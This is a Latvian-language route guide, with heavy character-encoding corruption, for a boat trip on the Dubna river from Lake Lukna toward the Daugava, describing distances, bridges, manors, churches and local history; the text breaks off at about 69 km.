Dubna no Luknas ezera lAi??dz Daugavai | Dēkaiņi

Dubna no Luknas ezera lAi??dz Daugavai


Dubna no Luknas ezera lAi??dz Daugavai Print This Post

ai??zDubna no Luknas ezera lAi??dz Daugavai-76 kmai???

MarA?ruta sA?kums nedaudz pA?rsegsies ar 3. marA?rutu, jo, ja ir izlemts doties ceA?ojumA? pa Dubnu, bet nav vAi??lmes izmantot ekstrAi??mA?ko, Dubnas augA?teces marA?rutu, tad ceA?ojumu vajadzAi??tu uzsA?kt no Luknas ezera DA gala pie putnu vAi??roA?anas torAi??a. Ai??eit var nokA?Ai??t, braucot no Ai??poA?iem uz ViA?Ai??iem un pie ceA?a rA?dAi??tA?ja nogrieA?oties uz Aglonas pusi. ApmAi??ram pAi??c 2 km A?Ai??Ai??rsojam tiltu pA?r Dubnu, kas savieno ViA?Ai??u un Luknas ezerus. Aiz tilta pirmajA? lauku celiAi??A? nogrieA?amies pa kreisi un nonA?kam ezera krastA?, kur ir ierAi??kota atpAi??tas vieta un atrodas putnu vAi??roA?anas tornis. Ai??eit ir Ai??rti piebraukt, iekA?pt laivA?s un uzsA?kt marA?rutu.

No putnu vAi??roA?anas torAi??a paveras skaistas ainavas uz apkA?rtAi??jiem ezeriem un majestA?tisko ViA?Ai??u Sv. JA?Ai??a KristAi??tA?ja Romas katoA?u baznAi??cu.

 

 

 

 

 

BaznAi??ca tika bAi??vAi??ta no 1908. – 1925. gadam. TA? ir ievAi??rojams valsts nozAi??mes arhitektAi??ras piemineklis, viena no nedaudzajA?m sakrA?lajA?m celtnAi??m Daugavpils rajonA?, kas ir celta no A?Ai??eltiem laukakmeAi??iem un pieder pie viena torAi??a bazilikA?Ai??u krusta baznAi??cu tipa. ViA?Ai??u pirmA? baznAi??ca celta 1621. gadA? no ozola baA?Ai??iem par godu svAi??tajam JA?nim KristAi??tA?jam. To cAi??la muiA?nieki Andrejs un Elizabete Moli A?rpus ViA?Ai??u ciema, kapsAi??tA?. 1625. gadA? nodibinA?ja ViA?Ai??u draudzi. Ai??Ai?? baznAi??ca draudzei kalpoja 94 gadus. 1715. gadA? par Heronima un Katrinas Molas lAi??dzekA?iem baznAi??cu nojauca un pA?rcAi??la tuvA?k pie ViA?Ai??iem, uz ezera pussalas. Ai??Ai?? baznAi??ca draudzei kalpoja 224 gadus, un tA?s lielums bija 410 kubikmetri. VecA? ViA?Ai??u baznAi??ca bija oriA?inA?ls arhitektAi??ras piemineklis. 1891. gadA? Lieldienu svAi??tkos ViA?Ai??u baznAi??cu piemeklAi??ja nelaime. TA? kA? kora telpA?s (luktA?s) sakA?pa daudz cilvAi??ku, tievie un sapuvuA?ie stabiAi??i, uz ko balstAi??jA?s luktas, nolAi??za. HallAi?? (baznAi??cA?) iebruka griesti ar luktA?m. Tas prasAi??ja vairA?ku personu upurus un daA?us sakropA?oja uz visu mAi??A?u. 1894. gadA? salaboja iebrukuA?os griestus un ielika mAi??ra stabiAi??us salAi??zuA?o vietA?. PAi??c A?Ai?? notikuma 1907. gada 2. augustA? MogiA?evas arhibAi??skapa kAi??rija PAi??terpilAi?? griezA?s pie gubernatora ar lAi??gumu atA?aut ViA?Ai??os celt jaunu mAi??ra baznAi??cu. 1908. gadA? prA?vests B. VerA?bickis nevis vecA?s baznAi??cas vietA?, bet A?rpus ViA?Ai??u miesta uzsA?ka celt jaunu baznAi??cu. BaznAi??cu cAi??la pAi??c LiepA?jas arhitekta StandmaAi??a bAi??vprojekta. 1937. gadA? veco koka baznAi??cu ViA?Ai??os nojauca. To pA?rveda uz Valmieru un tur uzstA?dAi??ja no jauna. TA? treA?o reizi A?o baznAi??cu pA?rbAi??vAi??ja. VecA?s koka baznAi??cas vietA? ir redzami pagrabi, tur arAi?? atrodas muiA?nieku Molu kapu kapenes, kas ir apskatA?mas ViA?Ai??u ciematA? – pussalA? pie Dotkas ezera. TA?m lAi??dzA?s ir baznAi??cas kapi.

NetA?lu no vecA?s baznAi??cas pagrabiem un Molu A?imenes kapenAi??m, ViA?Ai??u ezera krastA?, atrodas ViA?Ai??u ebreju kapi, kas arAi?? ir interesants apskates objekts. KapsAi??ta izveidota 19. gadsimta sA?kumA?. To izmantoja arAi?? Somersetas (tagad Aglonas) ebreji.

Ebreji ViA?Ai??u apkaimAi?? sA?ka apmesties 18. gadsimta beigA?s. SA?koties I pasaules karam, daudzi no viAi??iem aizbrauca uz Krievijas iekA?ieni, citiem pAi??c tam izdevA?s emigrAi??t uz Amerikas SavienotajA?m valstAi??m un IzraAi??lu. TaA?u daA?a atgriezA?s ViA?Ai??os. 1921. gadA? ViA?Ai??os atvAi??ra 4 klaA?u ebreju skolu, kurA? mA?cAi??bas notika idiA?A?. 20. gadsimta 30. gados ViA?Ai??os ebreji veidoja 56% (423 cilvAi??ki) no kopAi??jA? iedzAi??votA?ju skaita. 1935. gadA? 50 no ViA?Ai??u 58 amatniecAi??bas un tirdzniecAi??bas uzAi??Ai??mAi??jiem bija ebreji.

Ai??o kapsAi??tu ieskauj mAi??ra A?ogs ar metA?la vA?rtiem. SenA?kie kapu pieminekA?i ai??i?? akmens stAi??las – A?ajA? kapsAi??tA? datAi??tas ar 19. gadsimta 50. ai??i?? 90. gadiem. LielA?kA? daA?a pieminekA?u ir labi saglabA?juA?ies, taA?u ir stAi??las, kas daA?Ai??ji ieauguA?as zemAi??, saA?Ai??iebuA?A?s un nolauztas. Ai??ajA? kapsAi??tA? ir arAi?? daA?i oheli ai??i?? mA?jiAi??as, ko parasti cAi??la uz ievAi??rojamu cilvAi??ku (piemAi??ram, rabAi??nu) kapu kopiAi??A?m. Oheli veidoti no betona. StAi??las galvenokA?rt ir no pelAi??kiem un tumA?iem laukakmeAi??iem. Ir arAi?? daA?as melnA? granAi??ta stAi??las, kas attiecinA?mas uz 20. gadsimtu. StAi??lu noformAi??jums ir A?oti vienkA?rA?s, bez grezniem dekoriem.

Ir vAi??rts arAi?? apskatAi??t ViA?Ai??u (Molu) muiA?as apbAi??vi ar parku, kas veidojusies 19. gs. beigA?s. MuiA?as pils atradA?s tagadAi??jA? ciemata centrA?. TA? bija pils ar diviem torAi??iem. PAi??c 1. Pasaules kara Ai??ka nodega. MuiA?a piederAi??ja Hermanim un LetAi??cijai MoA?iem. Pavisam apkA?rtnAi?? viAi??u Ai??paA?umA? bija 18 pusmuiA?as ar 4000 ha zemes. Zemi iznomA?ja vai arAi?? to pA?rvaldAi??ja muiA?kungi. LAi??dz mAi??sdienA?m saglabA?jusies klAi??ts, kAi??ts, divstA?vu dzAi??vojamA? Ai??ka, kurA? ilgus gadus bija ViA?Ai??u lauksaimniecAi??bas tehnikuma mA?cAi??bu telpas. Ai??eit arAi?? atrodas daA?Ai??ji regulA?ra un brAi??va plA?nojuma parks, kurA? ir ap 75 eksotisku augu sugu.

UzsA?kuA?i laivu braucienu un A?Ai??Ai??rsojuA?i Luknas ezeru, pAi??c 5,6 km nonA?kam pie Daugavpils ai??i?? RAi??zekne A?osejas tilta Ai??poA?os, vAi??l pAi??c 400 m nonA?kam pie dzelzceA?a tilta. Aiz Luknas ezera upes plAi??dums sA?kas pa Jersikas lAi??dzenumu, tas kA?Ai??st mierAi??gs un bez lieliem A?Ai??Ai??rA?A?iem, lai gan atseviA?Ai??A?s vietA?s koku sanesumi var bAi??t. Upe kA?Ai??st arAi?? platA?ka ai??i?? vidAi??jais platums sasniedz 15 – 20 metrus. Krasti ir zemi, tA?dAi??A? senA?k upei pieguA?oA?A?s pA?avas un aramzemes pavasaros applAi??da. Jau 30. gados Latvijas valdAi??ba finansAi??ja vienu no lielA?kajiem tA? laika meliorA?cijas pasA?kumiem un regulAi??ja upes posmu 61,6 km garumA?. TA? rezultA?tA? upes krastos izveidojuA?A?s daudzas attekas un vecupes. AtseviA?Ai??i upes posmi ir iztaisnoti. TomAi??r apmaldAi??ties ir grAi??ti ai??i?? ceA?otA?jiem jA?paA?aujas uz galvenajA?m upes straumAi??m, kas vienmAi??r norA?da pareizo virzienu.

 

PAi??c 1,5 km aiz dzelzceA?a tilta nonA?kam pie dzelzsbetona tilta. Ai??is ceA?A? savieno PreiA?u ai??i?? Ai??poA?u A?oseju ar CeplAi??A?iem ai??i?? nelielu apdzAi??votu vietu. PAi??c 1,35 km Dubna pietuvojas minAi??tajai PreiA?u ai??i?? Ai??poA?u A?osejai. Ai??eit ir manA?mas mA?jas, kurA?m ir zAi??mAi??gs nosaukums ai??i?? PariA?a. VAi??l pAi??c 1,45 km esam Kolomostos pie tilta, kur PreiA?u ai??i?? Ai??poA?u A?oseja A?Ai??Ai??rso Dubnu. No marA?ruta sA?kuma esam veikuA?i 10,3 km.

 

 

 

 

DrAi??z pAi??c tilta, izmetot pAi??dAi??jo aso lAi??kumu, Dubna kA?Ai??st taisnA?ka. Krasti pA?rsvarA? ir klA?ti ar krAi??miem, aiz kuriem ir pA?avas. Upei pietuvojas Ai??poA?u ai??i?? RoA?upes ceA?A?, kas lAi??dz paA?ai RoA?upei iet paralAi??li upei. PAi??c 2,2 km upi A?Ai??Ai??rso augstsprieguma elektrolAi??nija. Aiz elektrolAi??nijas, pAi??c 400 m, no labA?s puses DubnA? ietek JaA?a, bet vAi??l pAi??c 460 m upi A?Ai??Ai??rso gA?jAi??juAi?? tiltiAi??A?. Aiz tiltiAi??a upes labajam krastam pietuvojas grantAi??ts ceA?A?, pa kuru var nokA?Ai??t NAi??dermuiA?A? un PelAi??A?os. Aiz tiltiAi??a, pAi??c 260 m, nonA?kam pie poldera sAi??kAi??u stacijas. Te var Ai??rti piestA?t, izkA?pt krastA? un atpAi??sties. No marA?ruta sA?kuma esam veikuA?i 13,6 km.

 

 

 

Pie ietekas DubnA? gar JaA?as labo krastu 1974. gadA? PelAi??A?u pagastA? izveidoja 614 ha lielu Strimina polderi ar sAi??kAi??u staciju un 2,3 km garu aizsargdambi. Polderis ai??i?? ar dambjiem norobeA?ota, nosusinA?ta platAi??ba palienAi??. PolderAi?? Ai??denslAi??meni parasti regulAi?? ar sAi??kAi??iem, retA?k ar slAi??A?A?m, izmantojot Ai??denslAi??meAi??a svA?rstAi??bas Ai??denstilpAi?? vai Ai??denstecAi?? aiz aizsargdambja. AtkarAi??bA? no iespAi??jamA? applAi??A?anas reA?Ai??ma un izmantoA?anas veida izA?Ai??ir ziemas jeb nepA?rplAi??stoA?os polderus un vasaras jeb pA?rplAi??stoA?os polderus. JA?atzAi??mAi?? gan, ka paA?laik A?Ai?? poldera platAi??ba sA?k aizaugt ar krAi??miem, un nosusinA?A?anas sistAi??mas sA?k sabrukt. Strimina polderAi?? Ai??denslAi??meni regulAi?? ar sAi??kAi??iem un lieko Ai??deni ievada DubnA? pie minAi??tA?s sAi??kAi??u stacijas. Ja lAi??cAi??tAi?? pie A?Ai??s sAi??kAi??u stacijas burbuA?o Ai??dens, tad tas nozAi??mAi??, ka sAi??kAi??i strA?dA? un liekais Ai??dens tiek novadAi??ts.

NA?koA?ais orientieris mAi??su marA?rutA? ir kA?rtAi??jA? augstsprieguma elektrolAi??nija, kuru sasniedzam pAi??c 2,5 km. VAi??l pAi??c 4,3 km sasniedzam Arendoles muiA?u. Ai??is upes posms lAi??dz Arendoles muiA?ai ir mierAi??gs. Upe plAi??st pa pA?avA?m – krasti ir lAi??zeni un apauguA?i ar krAi??miem un alkA?Ai??iem. TA? kA? upe ir taisnota, tad vietA?m atzarojas vecupes, kuras gan ir aizauguA?as un bieA?i nav pat pamanA?mas.

Par tuvoA?anos Arendoles muiA?ai liecina parks ar varenajiem kokiem, kas izceA?as kopAi??jA? upes krasta ainavA?. Arendoles apkA?rtnAi?? Dubnas upe ir ar salAi??dzinoA?i augstiem krastiem. Ai??eit vajadzAi??tu piestA?t un iepazAi??ties ar Arendoles muiA?u, parku un Arendoles katoA?u baznAi??cu.

Arendoles muiA?a izveidojA?s 18. gs. SA?kotnAi??ji tA? piederAi??ja muiA?nieku LAi??dingshauzenu dzimtai, bet vAi??lA?k ZAi??bergu dzimtai. MuiA?u vAi??l sauca par Randaukas muiA?u, A?o nosaukumu daA?kA?rt lieto arAi?? vietAi??jie iedzAi??votA?ji. PaA?reizAi??jais muiA?as komplekss ir veidots 19. gs. TajA? ietilpst historisma stila kungu mA?ja, medAi??bu pils un parks. Pilij ir savdabAi??gs astoAi??stAi??ra tornis ar pulksteni, vAi??jrA?di un grA?fu PlA?teru – ZAi??bergu A?erboni. 1905. g. nemieru laikA? pili nenodedzinA?ja, jo tA?s Ai??paA?nieki grA?fi PlA?teri – ZAi??bergi bija lojA?li pret vietAi??jiem zemniekiem. 6,5 ha lielajA? muiA?as parka liepA?s aug LatvijA? reti sastopamais baltais A?mulis.

 

Blakus muiA?ai atrodas Arendoles DievmA?tes Romas katoA?u baznAi??ca. SA?kotnAi??ji ArendolAi?? bija astoAi??stAi??raina koka kapliA?a, kurA? dievkalpojumus noturAi??ja LAi??ksnas prA?vesti A?etras reizes gadA?. VAi??lA?k to apkalpoja Kalupes prA?vesti. PirmA? Pasaules kara laikA?, 1916. gadA?, karavAi??ri kapliA?u izjauca un sadedzinA?ja malkA?. Arendoles draudzi nodibinA?ja pAi??c PirmA? pasaules kara. 1926. gadA? Kalupes prA?vests VitA?lijs TreibA?o draudzes vajadzAi??bA?m iegA?dA?jA?s nopostAi??tu mAi??ra Ai??ku ai??i?? bijuA?o muiA?as Ai??ku, kas iepriekA? kalpoja kA? galdnieku darbnAi??ca. PrA?vests to pielA?goja baznAi??cas vajadzAi??bA?m, samAi??rAi??jot sienas, ieliekot grAi??du un griestus, kA? arAi?? uzbAi??vAi??jot tornAi??ti. Dievnamam tika iegA?dA?ts koka altA?ris ar DievmA?tes un JAi??zus Sirds gleznu. BaznAi??cu iesvAi??tAi??ja 1936. gada oktobrAi?? Aglonas dekA?ns A. Broks DievmA?tes godam. Padomju varas gados, 1966. gadA?, baznAi??ca tika atAi??emta draudzei un izmantota laicAi??gA?m vajadzAi??bA?m. Draudzes darbAi??ba tika atjaunota 1989. gadA?, kad tA? atguva baznAi??cu. 2004. gada vasarA? prA?vesta Aleksandra MadelA?na vadAi??bA? baznAi??cai tika atjaunots tornis ar krustu.

ArendolAi?? ir apskatA?ms 2010. gadA? atklA?tais piemineklis ai??zNepakA?A?vAi??bas godinA?A?anaai???, kas ir veltAi??ts aizsargam un policistam JA?nim Babrim. Kad 1941. gada 14. jAi??nijA? sA?kA?s deportA?cijas, tikai pA?ris vietA?s LatvijA? policisti pretojA?s arestam. Viena no A?Ai??m vietA?m un viens no retajiem sveA?ajai varai nepakA?A?vAi??gajiem bija policists JA?nis Babris (1904ai??i??1982) ArendolAi??. Kad A?ekisti ieradA?s viAi??u apcietinA?t, JA?nis Babris raidAi??ja vairA?kus precAi??zus A?A?vienus. ViAi??A? ieskrAi??ja mA?jA? un pa atvAi??rtA?m durvAi??m ar dienesta pistoli vienu A?ekistu nogalinA?ja, otru ievainoja, bet treA?ais, savA?cis ievainoto, aizbAi??ga. Tas izglA?ba ne tikai viAi??a dzAi??vAi??bu, bet arAi?? Latvijas policijas mundiera godu. JA?nis Babris negaidAi??ja pavAi??les (okupAi??tajA? LatvijA? tA?s vairs nevarAi??ja atskanAi??t), bet domA?ja un rAi??kojA?s patstA?vAi??gi. NepakA?A?vAi??ba nozAi??mAi?? brAi??vAi??bu. VienA? gadAi??jumA? ai??i?? godpilnu nA?vi fiziska pA?rspAi??ka priekA?A?, citA? gadAi??jumA?, kA? tas bija ar JA?ni Babri, personisku brAi??vAi??bu.

 

ApskatAi??juA?i Arendoli, sAi??A?amies laivA?s un turpinA?m marA?rutu. PAi??c 670 metriem esam nokA?uvuA?i pie ceA?a Arendole ai??i?? PelAi??A?i tilta. Tie, kas ir nolAi??muA?i veikt vienas dienas marA?rutu, A?eit savu ceA?ojumu beidz. No marA?ruta sA?kuma esam veikuA?i 21,0 km.

PAi??c 2,3 km labajA? pusAi?? DubnA? ietek Ai??ustas upAi??te. VAi??l pAi??c 4,2 km kreisajA? krastA? ir manA?mas Lozdu mA?jas. Pie A?Ai??m mA?jA?m ir apskatA?ms diA?ozols ai??i?? PAi??ces ozols. TA? stumbra apkA?rtmAi??rs ir 7,5 m, un tas ir otrs diA?A?kais diA?koks bijuA?ajA? PreiA?u rajonA?. DiemA?Ai??l A?is dabas piemineklis ir kritiskA? stA?voklAi??.

 

 

 

PAi??c 3,2 km aiz LozdA?m sasniedzam VecvA?rkavas tiltu. VecvA?rkava ir Upmalas pagasta centrs. Ai??eit var ieplA?not veikala apmeklAi??jumu, kA? arAi?? apskatAi??t ievAi??rojamA?kA?s vietas. No marA?ruta sA?kuma esam veikuA?i 30,7 km.

VietA?, kur tagad atrodas VecvA?rkava, 16. gs. izveidojA?s VA?rkavas tirgotA?ju foA?varks (no poA?u valodas – pusmuiA?a, viensAi??ta), kurA? tirgotA?jiem bija pienA?kums iepirkt Polijas karalim visA?da veida meA?a preces ai??i?? bAi??vkokus, pelnus, ogles un daA?A?das zvAi??rA?das. MinAi??ts, ka 1784. gadA? VA?rkavas foA?varkA?, pie kA?das dzAi??vojamA?s mA?jas, atradA?s uniA?tu koka baznAi??ca. Kad A?Ai?? baznAi??ca celta, nav zinA?ms. 19. gs. VA?rkavas foA?varks kA?uva par patstA?vAi??gu muiA?u, un tad arAi?? tika uzcelta VA?rkavas muiA?as mAi??ra pils un netA?lu no tA?s – VA?rkavas draudzes mAi??ra baznAi??ca (1877. g.).

 

SA?kotnAi??jA? VA?rkavas muiA?as kungu mA?ja bija celta no koka, tA? nodega 1830. gadA?. JaunA? muiA?as pils vAi??lAi??nA? ampAi??ra stilA? ar seA?kolonu portiku bAi??vAi??ta 1865. g. PilAi?? ir koka kA?pnes, vietA?m saglabA?juA?A?s sA?kotnAi??jA? interjera detaA?as. No 1920. gada pils Ai??kA? darbojA?s skola, tagad A?eit atrodas VA?rkavas novada dome. Pils priekA?A? ir parA?des pagalms ar aplAi?? sastA?dAi??tA?m liepA?m, bet nogA?zAi?? pret Dubnu ai??i?? 18. gs. beigA?s veidots augA?u dA?rzs. 4,5 ha plaA?ais ainavu parks, kurA? aug eksotisku sugu stA?dAi??jumi un vairA?ki diA?koki, tapis 19. gs.

 

 

 

 

Pie VA?rkavas vidusskolas sA?kas ai??zVA?rkavas dabas takaai???. Taku 1998. gadA? izveidoja biedrAi??ba ai??zDabas draugu klubsai??? izcilA?s VA?rkavas vidusskolas bioloA?ijas un Ai??Ai??mijas skolotA?jas HelAi??nas PiziA?as vadAi??bA?. ai??zVA?rkavas dabas takA?ai??? var apskatAi??t VA?rkavas novadam raksturAi??go augu valsti, dabiskas ainavas, arheoloA?iskas celtnes (iekA?auta VA?rkavas muiA?as pils un VA?rkavas Romas katoA?u VissvAi??tA?s TrAi??svienAi??bas baznAi??ca) un kultAi??rvAi??sturiskas vietas. Laiks, kas nepiecieA?ams, lai iepazAi??tos ar taku, ir 2,5 stundas. TA?s marA?ruts – 2,5 km ar 20 apskates objektiem. Tiek piedA?vA?tas vairA?kas tematiskA?s ekskursijas: ai??zVA?rkavas takaai??? (2,5 st.), krastu flora un fauna (1,5 st.), dzAi??ve pA?avA? (1 st.), dendroloA?ija (1 st.), A?rstniecAi??bas augi (1 st.), pAi??tniecAi??ba Dubnas upAi?? (2 st.). Ja ir vAi??lAi??A?anA?s taku iepazAi??t gida pavadAi??bA?, tad jA?zvana HelAi??nai PiziA?ai, tA?lrunis ai??i?? 29443089.

ZemA?k minAi??tajA? adresAi?? takas ceA?vedi var iegAi??t internetA? pdf formA?tA? http://www.varkava.lv/upload/dabas%20taka.pdf.

Turpinot marA?rutu apmAi??ram 2,5 km, upes labajA? krastA? ir manA?ma VecvA?rkavas apbAi??ve.

6 km pAi??c VecvA?rkavas tilta, upes labajA? krastA?, manA?ms lielA?ks meA?a masAi??vs. Ai??eit, DzeAi??os, savA? privA?tajA? meA?a Ai??paA?umA?, netA?lu no upes, ValentAi??na un Eduards ValaiAi??i ir radAi??juA?i meA?a taku ai???SprAi??dAi??A?iai???. Ai??ajA? vietA?, kur aug 200 gadus veca priede, vecvecA?ku stA?dAi??ts osis un citi koki, vispirms tapa koka bAi??diAi??a ai??i?? ai??zVigvamsai???, pAi??c tam savu vietu atrada SprAi??dAi??tis, VadA?tA?js, indiA?Ai??u pasaku varoAi??i, A?Ai??audzAi??jA?Ai??ska, RAi??Ai??Ai??tis, Mednieks un citi tAi??li, kurus ir veidojusi ValentAi??na no dabas materiA?liem. ValaiAi??u pA?ris savA? meA?a takA? ir uzAi??Ai??muA?i gan sava novada, gan tA?lA?ku novadu ciemiAi??us. Ja ir vAi??lAi??A?anA?s dzirdAi??t saimnieku stA?stAi??jumu, tad iepriekA? bAi??tu jA?piezvana (mob. +371 22035005) un jA?vienojas par apmeklAi??juma laiku. Eduards ir izcils stA?stnieks un humorists, kas neA?auj garlaikoties itin nevienam.

Aiz ai???SprAi??dAi??A?uai??? meA?a takas, apmAi??ram pAi??c 1 km, Dubnas kreisajA? krastA? sA?kas RimicA?nu apbAi??ve. RimicA?ni ir RoA?kalnu pagasta centrs. Ciemata apbAi??vi te sA?ka veidot padomju laikA?.

Turpinot marA?rutu, pAi??c 3,9 km sasniedzam MazkursAi??A?u gA?jAi??ju tiltiAi??u. No marA?ruta sA?kuma esam veikuA?i 41,6 km. PAi??c nepilniem 2 km Dubna plAi??st pavisam tuvu VecvA?rkavas ai??i?? RoA?upes lielceA?am. TurpmA?kais orientieris mAi??su marA?rutA? ir gA?jAi??ju tiltiAi??A? StarAi??s. Starp MazkursAi??A?u tiltiAi??u un A?o tiltiAi??u ir 10,4 km.

 

 

 

 

 

Ai??eit, Dubnas kreisajA? krastA?, ir ierAi??kota gaumAi??ga atpAi??tas vieta. Te var plA?not nakA?Ai??oA?anu un ierAi??kot nometni. VienAi??gais traucAi??klis varAi??tu bAi??t tas, ka A?eit pavisam tuvu atrodas autoceA?A? Kalupe – RoA?upe. Ai??ajA? vietA? ir arAi?? Ai??rti uzsA?kt un beigt ceA?ojumu.

 

 

 

 

 

Ja A?ajA? vietA? nolemts uzturAi??ties ilgA?k, tad var aiziet lAi??dz 1 km attA?lajam Vanagu ciemam. Pie tiltiAi??a, Dubnas labajA? krastA?, ir taciAi??a, kas jAi??s aizvedAi??s lAi??dz Vanagiem. Te var ieplA?not arAi?? iepirkA?anos.

 

 

 

 

 

A?si pirms Vanagiem taciAi??a mAi??s ved garA?m Vanagu vecajiem kapiem. Tepat atrodas arAi?? Vanagu SvAi??tA?s Annas Romas katoA?u draudzes baznAi??ca. VecA? Vanagu katoA?u baznAi??ca ir bAi??vAi??ta 1799. gadA? VecvA?rkavA? vai UpmalA?. To uz Vanagiem pA?rveda un uzstA?dAi??ja kapsAi??tA? uz sagatavotiem akmens pamatiem 1882. gadA?. Virs ieejas bija mazs tornAi??tis ar nelielu zvanu. GalvenajA? altA?rAi?? bija SvAi??tA? JA?Ai??a KristAi??tA?ja glezna, bet sA?nu altA?rAi?? SvAi??tA?s Annas glezna. Ai??Ai?? baznAi??ca kA?du laiku skaitAi??jA?s VA?rkavas filiA?le.

PAi??c RAi??gas bAi??skapijas atjaunoA?anas 1918. gadA? apvienojot daA?as no LAi??vA?nu un VA?rkavas draudzAi??m tika nodibinA?ta Vanagu draudze. TA? Vanagu kapu kapliA?a kA?uva par draudzes baznAi??cu. 1933. gadA? tika pieAi??emts lAi??mums sA?kt jaunas baznAi??cas bAi??vi. Jau 1934. gadA? LAi??vA?nu dekA?ns StaAi??islavs VaikuA?s iesvAi??tAi??ja baznAi??cas pamatus. 1936. gadA? baznAi??cai tika uzceltas jaunas mAi??ra sienas, un tA? tika pA?rsaukta par SvAi??tA?s Annas baznAi??cu. Ai??ajA? paA?A? gadA? bAi??skaps JA?zeps RancA?ns konsekrAi??ja jauno Vanagu baznAi??cu. Interesanti, ka jauno baznAi??cu cAi??la apkA?rt vecajai koka baznAi??cai. Dievnama lielajA? altA?rAi?? ir DievmA?tes glezna, kA? arAi?? SvAi??tA? JA?Ai??a KristAi??tA?ja un SvAi??tA?s Annas gleznas. Visi trAi??s altA?ri veidoti pAi??c Subates baznAi??cas altA?ru parauga, jo draudzes prA?vests Leons GarA?ka, kas vadAi??ja celtniecAi??bas darbus, bija cAi??lies no Subates draudzes.

Vanagu katoA?u draudzes priesteris no 1939. – 1945. gadam bija Antons JuhAi??eviA?s (JuhnAi??vics) – Latgales un Latvijas patriots. ViAi??A? 1945. gada 24. augustA? Dubnas meA?os dibinA?ja nacionA?lo partizA?nu apvienAi??bu, lai tA? atjaunotu 1918. gada 18. novembrAi?? nodibinA?to Latvijas valsti. Antona JuhAi??eviA?a vadAi??bA? 1945. gada 28.janvA?rAi?? tika atvairAi??ts A?ekistu uzbrukums Vanagu dievnamam. NodevAi??bas rezultA?tA? 1946. gadA? Antons JuhAi??eviA?s tika arestAi??ts. 1947. gada 14. februA?rAi?? viAi??am tika izpildAi??ts nA?vessods RAi??gas centrA?lcietumA?. 2005. gada 8. oktobrAi?? pie Vanagu dievnama sienas atklA?ja Antonam JuhAi??eviA?am veltAi??tu piemiAi??as plA?ksni.

AtgrieA?amies pie tiltiAi??a un turpinA?m marA?rutu. LAi??dz A?im tiltiAi??am no marA?ruta sA?kuma esam veikuA?i 52 km. TurpmA?kajA? posmA? upes abi krasti ir daudz apdzAi??votA?ki, jo tuvojamies RoA?upei, kas ir RoA?upes pagasta centrs. TA?s vA?rds rakstos parA?dA?s 1782. gadA?, kad senajA? VA?rkavas pagastA? jau ir divi foA?varki ai??i?? VA?rkavas un RoA?anovas (tagad RoA?upe).

PAi??c 6,7 km esam nonA?kuA?i pie nA?koA?A? gA?jAi??ju tiltiAi??a. IzkA?pjot labajA? krastA? un dodoties pa taciAi??u, nonA?kam RoA?upAi??. ArAi?? A?eit var ieplA?not iepirkA?anos vietAi??jA? veikalA?. Aiz tiltiAi??a, pAi??c 380 m, no labA?s puses DubnA? ietek Feimankas upe, bet vAi??l pAi??c 450 m mAi??s esam sasnieguA?i LAi??vA?ni – PreiA?i A?osejas tiltu. No marA?ruta sA?kuma esam veikuA?i 59,5 km. Pirms tilta, upes kreisajA? krastA?,, ir redzama apbAi??ve. ArAi?? tA? ir RoA?upe ai??i?? te atrodas RoA?upes pamatskola. NetA?lu no skolas ir piemineklis komponistam, Latvijas konservatorijas profesoram JAi??kabam GraubiAi??am, kas ir dzimis RoA?upes pagasta AptekA?s.

 

 

 

Aiz tilta, pAi??c 650 m, upes kreisajA? krastA? sA?kas mazdA?rziAi??u apbAi??ve, bet vAi??l pAi??c 1,6 km kreisajA? krastA? atrodas valsts nozAi??mes arheoloA?ijas piemineklis ai??i?? MuktupA?velu senkapi. Tie gan dabA? ir grAi??ti identificAi??jami, jo atrodas blAi??vi apdzAi??votA? vietA?.

1,3 km no MuktupA?velu senkapiem vai 3,55 km no A?osejas tilta DubnA? ietek labA? krasta pieteka ai??i?? OA?a. LAi??dz ar OA?as ieteku Dubna kA?Ai??st platA?ka un Ai??deAi??iem vAi??l bagA?tA?ka. TomAi??r no A?Ai??s vietas sA?kas arAi?? Dubnas posms, kas vasarA?s stipri aizaug ar Ai??densaugiem. 2010. gadA? A?eit notika upes padziA?inA?A?anas un gultnes tAi??rAi??A?anas darbi, lAi??dz ar to stA?voklis ir uzlabojies. AizaugoA?ais posms ir apmAi??ram 1,5 km garA?. Ai??ajA? posmA? Dubnas labajam krastam pietuvojas LAi??vA?nu – SteAi??u autoceA?A?, kas paralAi??li krastam iet lAi??dz pat LAi??vA?niem.

 

PAi??c 2,9 km no OA?as ietekas DubnA? nonA?kam pie dzelzceA?a un autoceA?a tilta. Ai??ie tilti savieno LAi??vA?nu – PreiA?u A?oseju ar SkrebeA?u purvu un LAi??vA?nu – SteAi??u autoceA?u. SkrebeA?u purvA? jau no 1933. gada iegAi??st kAi??dru, kad ar Ministru prezidenta KA?rA?a UlmaAi??a rAi??kojumu tika izveidota LAi??vA?nu kAi??dras fabrika, kas bija viena no pirmajA?m A?etrA?m kAi??dras fabrikA?m pirmskara LatvijA?. UlmaAi??laikos LAi??vA?nu kAi??dras fabrika lAi??dz ar Misas un Olaines fabriku kA?uva par lielA?kajiem valsts uzAi??Ai??mumiem kAi??dras ieguvAi??. Ne velti lAi??vA?nieA?i, kA? redzams senA?s fotogrA?fijA?s, no kAi??dras pat bAi??vAi??juA?i goda vA?rtus, 1935. gadA? Latgales vizAi??tes laikA? sagaidot KA?rli Ulmani.

No marA?ruta sA?kuma esam veikuA?i 66,0 km. TurpinA?m marA?rutu, un pAi??c 2,65 km nonA?kam pie viesu mA?jA?m ai??zKrastiai???, kas atrodas Dubnas upes labajA? krastA?. Ai??eit ir iespAi??jams patAi??kami atpAi??sties, ir sauna, var nopeldAi??ties iekA?rtotA? peldvietA?. Saimnieki piedA?vA? melno pirti, pirtnieka pakalpojumus. Ir arAi?? kempinga mA?jiAi??as, telA?u vietas, strAi??tbola laukums, estrA?de, nojumes pasA?kumiem. NepiecieA?amAi??bas gadAi??jumA? A?eit var plA?not nakA?Ai??oA?anu. Par visu vienoties var zvanot +371 28315677 vai rakstot uz e-pastu – [email protected]

Aiz ai??zKrastiemai???, pAi??c apmAi??ram 800 m, ir gA?jAi??ju tiltiAi??A? pA?r Dubnu. JA?atzAi??mAi??, ka no ai??zKrastiemai??? ir jAi??tams LAi??vA?nu tuvums – upes krasti kA?Ai??st arvien apdzAi??votA?ki un blAi??vA?k apbAi??vAi??ti. PAi??c gA?jAi??ju tiltiAi??a nA?koA?ais orientieris ir augstsprieguma elektrolAi??nijas, kuras sasniedzam pAi??c 2,85 km. PirmA? ir 330 Kv, bet otra 110 Kv lAi??nija.

 

 

 

 

 

